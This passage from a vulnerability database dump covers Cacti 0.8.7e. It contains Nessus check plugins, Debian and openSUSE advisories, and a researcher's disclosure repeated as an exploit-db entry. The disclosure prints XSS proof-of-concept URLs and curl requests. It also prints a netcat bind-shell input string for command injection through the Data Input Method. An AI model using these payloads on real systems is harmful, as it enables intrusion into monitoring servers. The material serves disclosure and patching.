reference:\"cacti-0.8.7e-3.fc12\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cacti\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-21T01:12:47", "bulletinFamily": "scanner", "description": "The package cacti was updated to fix four cross-site-scripting vulnerabilities (CVE-2009-4032: CVSS v2 Base Score: 4.9) and one privilege escalation bug (CVE-2009-4112).", "modified": "2016-12-21T00:00:00", "id": "SUSE_11_0_CACTI-091202.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=43025", "published": "2009-12-07T00:00:00", "title": "openSUSE Security Update : cacti (cacti-1627)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update cacti-1627.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43025);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:09:49 $\");\n\n script_cve_id(\"CVE-2009-4032\", \"CVE-2009-4112\");\n\n script_name(english:\"openSUSE Security Update : cacti (cacti-1627)\");\n script_summary(english:\"Check for the cacti-1627 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The package cacti was updated to fix four cross-site-scripting\nvulnerabilities (CVE-2009-4032: CVSS v2 Base Score: 4.9) and one\nprivilege escalation bug (CVE-2009-4112).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=558664\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cacti package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_cwe_id(79, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cacti\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"cacti-0.8.7e-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cacti\");\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:13:06", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been found in cacti, a frontend to rrdtool for monitoring systems and services. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2007-3112, CVE-2007-3113 It was discovered that cacti is prone to a denial of service via the graph_height, graph_width, graph_start and graph_end parameters. This issue only affects the oldstable (etch) version of cacti.\n\n - CVE-2009-4032 It was discovered that cacti is prone to several cross-site scripting attacks via different vectors.\n\n - CVE-2009-4112 It has been discovered that cacti allows authenticated administrator users to gain access to the host system by executing arbitrary commands via the 'Data Input Method' for the 'Linux - Get Memory Usage' setting.\n\n There is no fix for this issue at this stage. Upstream will implement a whitelist policy to only allow certain 'safe' commands.\n For the moment, we recommend that such access is only given to trusted users and that the options 'Data Input' and 'User Administration' are otherwise deactivated.", "modified": "2018-11-10T00:00:00", "id": "DEBIAN_DSA-1954.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44819", "published": "2010-02-24T00:00:00", "title": "Debian DSA-1954-1 : cacti - insufficient input sanitising", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1954. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44819);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/11/10 11:49:34\");\n\n script_cve_id(\"CVE-2007-3112\", \"CVE-2007-3113\", \"CVE-2009-4032\", \"CVE-2010-2543\");\n script_bugtraq_id(37109);\n script_xref(name:\"DSA\", value:\"1954\");\n\n script_name(english:\"Debian DSA-1954-1 : cacti - insufficient input sanitising\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been found in cacti, a frontend to\nrrdtool for monitoring systems and services. The Common\nVulnerabilities and Exposures project identifies the following\nproblems :\n\n - CVE-2007-3112, CVE-2007-3113\n It was discovered that cacti is prone to a denial of\n service via the graph_height, graph_width, graph_start\n and graph_end parameters. This issue only affects the\n oldstable (etch) version of cacti.\n\n - CVE-2009-4032\n It was discovered that cacti is prone to several\n cross-site scripting attacks via different vectors.\n\n - CVE-2009-4112\n It has been discovered that cacti allows authenticated\n administrator users to gain access to the host system by\n executing arbitrary commands via the 'Data Input Method'\n for the 'Linux - Get Memory Usage' setting.\n\n There is no fix for this issue at this stage. Upstream will\n implement a whitelist policy to only allow certain 'safe' commands.\n For the moment, we recommend that such access is only given to\n trusted users and that the options 'Data Input' and 'User\n Administration' are otherwise deactivated.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=429224\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-3112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-3113\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-4032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-4112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1954\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the cacti packages.\n\nFor the oldstable distribution (etch), these problems have been fixed\nin version 0.8.6i-3.6.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.8.7b-2.1+lenny1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cacti\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"cacti\", reference:\"0.8.6i-3.6\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"cacti\", reference:\"0.8.7b-2.1+lenny1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\nCacti 0.8.7e and earlier versions are affected by multiple security\r\nissues. Issues 1-4 are cross site scripting issues, issue 5 is a\r\npriviledge escalation issue.\r\n\r\n\r\n\r\n\r\n1. XSS 1\r\n\r\nA HTTP GET request against the following URL will, on a web browser\r\nwith Javascript support, cause a dialog box saying '1' to be displayed:\r\n\r\nhttp://CACTIHOST/graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility:hidden%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx%20y=%27\r\n\r\nThis vulnerability is only exploitable if the victim is allowed to view\r\ngraphs. This will be true if the victim has previously authenticated\r\nagainst Cacti or if both the guest user has been activated (default:\r\ndisabled) and the graph view permission was set to 'guest' (default:\r\n'No User').\r\n\r\nThis vulnerability was tested with Firefox 3.0.6.\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n2. XSS 2\r\n\r\nThe following curl invocation will generate a HTTP POST request\r\nagainst\r\n\r\nhttp://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true\r\n\r\nwith an 'application/x-www-form-urlencoded' content type HTTP body part\r\ncontaining\r\n date1=%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3Cx+y%3D%27'\r\nCurl will write the resulting output to a file named poc.html.\r\n\r\n> curl -d 'date1=%27%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E%3Cx+y%3D%27' 'http://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true' > poc.html\r\n\r\nWhen this file is loaded and rendered by a web browser with Javascript\r\nsupport, this will cause a dialog box saying '2' to be displayed.\r\n\r\nThis vulnerability is only exploitable if the victim is allowed to view\r\ngraphs. This will be true if the victim has previously authenticated\r\nagainst Cacti or if both the guest user has been activated (default:\r\ndisabled) and the graph view permission was set to 'guest' (default:\r\n'No User').\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n3. XSS 3\r\n\r\nIf an attacker or the victim has permission to modify the graph\r\ndisplay settings via graph_settings.php, the attacker is able to\r\npersistently inject javascript code via the 'page_refresh' and\r\n'default_dual_pane_width' parameters.\r\n\r\nSetting 'page_refresh' to the following value will, on any consecutive\r\nvisitors' web browser with Javascript support, cause a dialog box saying\r\n'3' to be displayed:\r\n 300'><script>alert(3)</script><x y='\r\n\r\nSetting 'default_dual_pane_width' to the following value will, on any\r\nconsecutive visitors' web browser with Javascript support, cause a\r\ndialog box saying '3' to be displayed:\r\n 200"><script>alert(3)</script><x y="\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n4. XSS 4\r\n\r\nA HTTP GET request against the following URL will, on a web browser\r\nwith Javascript support, cause a dialog box saying '4' to be displayed:\r\n\r\n> >\r\nhttp://CACTIHOST/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E\r\n\r\nThis vulnerability is only exploitable if the victim is allowed to view\r\ngraphs. This will be true if the victim has previously authenticated\r\nagainst Cacti or if both the guest user has been activated (default:\r\ndisabled) and the graph view permission was set to 'guest' (default:\r\n'No User').\r\n\r\nAlternatively, a similar injection can be achieved, if an attacker or\r\nhis victim has permission to modify the graph display settings via\r\ngraph_settings.php. If so, the attacker is able to persistently inject\r\njavascript code via the 'title_size', 'legend_size', 'axis_size' and\r\n'unit_size' parameters.\r\n\r\nSetting any of these parameters to the following value will, on any\r\nconsecutive visitors' web browser with Javascript support, cause a\r\ndialog box saying '4' to be displayed:\r\n 8</pre><script>alert(4)</script><pre>\r\n\r\nThis vulnerability was tested with Firefox 3.0.6\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n5. Priviledge escalation\r\n\r\nFinally, due to the permissive way the web interface allows Cacti\r\nto be configured, a cacti administrator is also able to execute\r\narbitrary commands on the system as the user the Cacti polling mechanism\r\n runs as (usually a non-priviledged user).\r\n\r\nFor example, it is possible to successfully spawn (and connect to) a\r\nbackdoor/remote shell on the Cacti system by changing the "Data Input\r\nMethod" for "Linux - Get Memory Usage". Setting "Input String" to\r\n nohup nc -l -p 6666 -n -e /bin/sh &\r\nwould spawn a remotely accessible shell whenever this handler was called\r\n(every couple of minutes by default on my Debian test system).\r\n\r\nCacti developers say:\r\n> There is no effective way to fix the data input method without breaking Cacti. It will be reviewed for the release of 0.8.8.\r\n\r\n\r\n\r\nThe XSS issues are currently tracked as CVE-2009-4032 (additional CVEs\r\nmay or may not be assigned), issue 5 has not been tracked so far (to my\r\nknowledge).\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEAREKAAYFAksOFWYACgkQn6GkvSd/Bgwb0QCfZu7dWpBE7FSeds0jeFa1NmzN\r\nq44An3dl2cZgU/LRpZSjYpuqbo2Ukzbe\r\n=yeNz\r\n-----END PGP SIGNATURE-----", "modified": "2009-12-01T00:00:00", "published": "2009-12-01T00:00:00", "id": "SECURITYVULNS:DOC:22850", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22850", "title": "Cacti 0.8.7e: Multiple security issues", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1954-1 security@debian.org\r\nhttp://www.debian.org/security/ Steffen Joeris\r\nDecember 16, 2009 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : cacti \r\nVulnerability : insufficient input sanitising \r\nProblem type : remote \r\nDebian-specific: no \r\nCVE Ids : CVE-2007-3112 CVE-2007-3113 CVE-2009-4032 \r\nDebian Bugs : 429224 \r\n\r\nSeveral vulnerabilities have been found in cacti, a frontend to rrdtool\r\nfor monitoring systems and services. The Common Vulnerabilities and\r\nExposures project identifies the following problems:\r\n\r\nCVE-2007-3112, CVE-2007-3113\r\n\r\nIt was discovered that cacti is prone to a denial of service via the\r\ngraph_height, graph_width, graph_start and graph_end parameters.\r\nThis issue only affects the oldstable (etch) version of cacti.\r\n\r\nCVE-2009-4032\r\n\r\nIt was discovered that cacti is prone to several cross-site scripting\r\nattacks via different vectors.\r\n\r\nCVE-2009-4112\r\n\r\nIt has been discovered that cacti allows authenticated administrator\r\nusers to gain access to the host system by executing arbitrary commands\r\nvia the "Data Input Method" for the "Linux - Get Memory Usage" setting.\r\n\r\nThere is no fix for this issue at this stage. Upstream will implement a\r\nwhitelist policy to only allow certain "safe" commands. For the moment,\r\nwe recommend that such access is only given to trusted users and that\r\nthe options "Data Input" and "User Administration" are otherwise\r\ndeactivated.\r\n\r\n\r\nFor the oldstable distribution (etch), these problems have been fixed in\r\nversion 0.8.6i-3.6.\r\n\r\nFor the stable distribution (lenny), this problem has been fixed in\r\nversion 0.8.7b-2.1+lenny1.\r\n\r\nFor the testing distribution (squeeze), this problem will be fixed soon.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 0.8.7e-1.1.\r\n\r\n\r\nWe recommend that you upgrade your cacti packages.\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 4.0 alias etch\r\n- -------------------------------\r\n\r\nDebian (oldstable)\r\n- ------------------\r\n\r\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i.orig.tar.gz\r\n Size/MD5 checksum: 1122700 341b5828d95db91f81f5fbba65411d63\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6.diff.gz\r\n Size/MD5 checksum: 38419 4ee9e373817ebc32297e1c3de8fee10d\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6.dsc\r\n Size/MD5 checksum: 590 bb8fb25c6db1cd6a2a785f879943d969\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6_all.deb\r\n Size/MD5 checksum: 962816 9093e9f9abaa6c3dbbedad24cc1d4f7e\r\n\r\n\r\nDebian GNU/Linux 5.0 alias lenny\r\n- --------------------------------\r\n\r\nDebian (stable)\r\n- ---------------\r\n\r\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b.orig.tar.gz\r\n Size/MD5 checksum: 1972444 aa8a740a6ab88e3634b546c3e1bc502f\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1.diff.gz\r\n Size/MD5 checksum: 37232 04459452593e23c5e837920cfd0f1789\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1.dsc\r\n Size/MD5 checksum: 1117 d67349656ce9514266e7d5d2f378a219\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1_all.deb\r\n Size/MD5 checksum: 1847182 3876f128fdcc2aefa63d65531875d2ab\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAksoyH0ACgkQ62zWxYk/rQfXGwCeKMeQqicZ/LayzFqXznC2W0is\r\nEG8AoLUxcdouXG/aTvqnfKJyWZtpA9TM\r\n=CLbl\r\n-----END PGP SIGNATURE-----", "modified": "2009-12-16T00:00:00", "published": "2009-12-16T00:00:00", "id": "SECURITYVULNS:DOC:22951", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22951", "title": "[SECURITY] [DSA 1954-1] New cacti packages fix insufficient input sanitising", "type": "securityvulns", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T19:03:22", "bulletinFamily": "exploit", "description": "Cacti 0.8.x graph.php Multiple Parameter XSS. CVE-2009-4032 . Webapps exploit for php platform", "modified": "2009-11-21T00:00:00", "published": "2009-11-21T00:00:00", "id": "EDB-ID:33374", "href": "https://www.exploit-db.com/exploits/33374/", "type": "exploitdb", "title": "Cacti 0.8.x graph.php Multiple Parameter XSS", "sourceData": "source: http://www.securityfocus.com/bid/37109/info\r\n\r\nCacti is prone to multiple cross-site-scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.\r\n\r\nAttacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.\r\n\r\nVersions prior to Cacti 0.8.7g are vulnerable. \r\n\r\n\r\nhttp://www.example.com/graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility:hidden%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx%20y=%27\r\nhttp://www.example.com/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E\r\nhttp://www.example.com/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/33374/"}, {"lastseen": "2016-02-01T12:05:36", "bulletinFamily": "exploit", "description": "Cacti 0.8.7e: Multiple Security Issues. CVE-2009-4032,CVE-2010-2543. Webapps exploit for php platform", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "id": "EDB-ID:10234", "href": "https://www.exploit-db.com/exploits/10234/", "type": "exploitdb", "title": "Cacti 0.8.7e: Multiple Security Issues", "sourceData": "Moritz Naumann <security@moritz-naumann.com>\r\n\r\ncacti:\r\nhttp://www.cacti.net/\r\n\r\n=================================================================\r\nCacti 0.8.7e and earlier versions are affected by multiple security\r\nissues. Issues 1-4 are cross site scripting issues, issue 5 is a\r\npriviledge escalation issue.\r\n\r\n\r\n\r\n\r\n1. XSS 1\r\n\r\nA HTTP GET request against the following URL will, on a web browser\r\nwith Javascript support, cause a dialog box saying '1' to be displayed:\r\n\r\nhttp://CACTIHOST/graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility:hidden%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx%20y=%27\r\n\r\nThis vulnerability is only exploitable if the victim is allowed to view\r\ngraphs. This will be true if the victim has previously authenticated\r\nagainst Cacti or if both the guest user has been activated (default:\r\ndisabled) and the graph view permission was set to 'guest' (default:\r\n'No User').\r\n\r\nThis vulnerability was tested with Firefox 3.0.6.\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n2. XSS 2\r\n\r\nThe following curl invocation will generate a HTTP POST request\r\nagainst\r\n\r\nhttp://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true\r\n\r\nwith an 'application/x-www-form-urlencoded' content type HTTP body part\r\ncontaining\r\n date1=%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3Cx+y%3D%27'\r\nCurl will write the resulting output to a file named poc.html.\r\n\r\n> curl -d 'date1=%27%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E%3Cx+y%3D%27' 'http://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true' > poc.html\r\n\r\nWhen this file is loaded and rendered by a web browser with Javascript\r\nsupport, this will cause a dialog box saying '2' to be displayed.\r\n\r\nThis vulnerability is only exploitable if the victim is allowed to view\r\ngraphs. This will be true if the victim has previously authenticated\r\nagainst Cacti or if both the guest user has been activated (default:\r\ndisabled) and the graph view permission was set to 'guest' (default:\r\n'No User').\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n3. XSS 3\r\n\r\nIf an attacker or the victim has permission to modify the graph\r\ndisplay settings via graph_settings.php, the attacker is able to\r\npersistently inject javascript code via the 'page_refresh' and\r\n'default_dual_pane_width' parameters.\r\n\r\nSetting 'page_refresh' to the following value will, on any consecutive\r\nvisitors' web browser with Javascript support, cause a dialog box saying\r\n'3' to be displayed:\r\n 300'><x y='\r\n\r\nSetting 'default_dual_pane_width' to the following value will, on any\r\nconsecutive visitors' web browser with Javascript support, cause a\r\ndialog box saying '3' to be displayed:\r\n 200\"><x y=\"\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n4. XSS 4\r\n\r\nA HTTP GET request against the following URL will, on a web browser\r\nwith Javascript support, cause a dialog box saying '4' to be displayed:\r\n\r\n> >\r\nhttp://CACTIHOST/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E\r\n\r\nThis vulnerability is only exploitable if the victim is allowed to view\r\ngraphs. This will be true if the victim has previously authenticated\r\nagainst Cacti or if both the guest user has been activated (default:\r\ndisabled) and the graph view permission was set to 'guest' (default:\r\n'No User').\r\n\r\nAlternatively, a similar injection can be achieved, if an attacker or\r\nhis victim has permission to modify the graph display settings via\r\ngraph_settings.php. If so, the attacker is able to persistently inject\r\njavascript code via the 'title_size', 'legend_size', 'axis_size' and\r\n'unit_size' parameters.\r\n\r\nSetting any of these parameters to the following value will, on any\r\nconsecutive visitors' web browser with Javascript support, cause a\r\ndialog box saying '4' to be displayed:\r\n 8</pre><pre>\r\n\r\nThis vulnerability was tested with Firefox 3.0.6\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n5. Priviledge escalation\r\n\r\nFinally, due to the permissive way the web interface allows Cacti\r\nto be configured, a cacti administrator is also able to execute\r\narbitrary commands on the system as the user the Cacti polling mechanism\r\n runs as (usually a non-priviledged user).\r\n\r\nFor example, it is possible to successfully spawn (and connect to) a\r\nbackdoor/remote shell on the Cacti system by changing the \"Data Input\r\nMethod\" for \"Linux - Get Memory Usage\". Setting \"Input String\" to\r\n nohup nc -l -p 6666 -n -e /bin/sh &\r\nwould spawn a remotely accessible shell whenever this handler was called\r\n(every couple of minutes by default on my Debian test system).\r\n\r\nCacti developers say:\r\n> There is no effective way to fix the data input method without breaking Cacti. It will be reviewed for the release of 0.8.8.\r\n\r\n\r\n\r\nThe XSS issues are currently tracked as CVE-2009-4032 (additional CVEs\r\nmay or may not be assigned), issue 5 has not been tracked so far (to my\r\nknowledge).\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/10234/"}], "jvn": [{"lastseen": "2018-08-31T00:36:15", "bulletinFamily": "info", "description": "\n ## Description\n\nCacti is a web application that graphs stored data collected from network devices. Cacti contains a cross-site scripting vulnerability (CWE-79) due to a flaw in processing parameters in graph_view.php.\n\n ## Impact\n\nIf a user views a malicious page while logged in, an arbitrary script may be executed on the user's web browser.\n\n ## Solution\n\n**Update the software** \nUpdate to the latest version according to the information provided by the developer. \n \nAccording to the developer, this issue was addressed in 0.8.7f released in 2010.\n\n ## Products Affected\n\n * Cacti 0.8.7e and earlier\n", "modified": "2015-07-09T00:00:00", "published": "2015-07-09T00:00:00", "id": "JVN:09758120", "href": "http://jvn.jp/en/jp/JVN09758120/index.html", "title": "JVN#09758120: Cacti vulnerable to cross-site scripting", "type": "jvn", "cvss": {"score": 4.3, "vector": 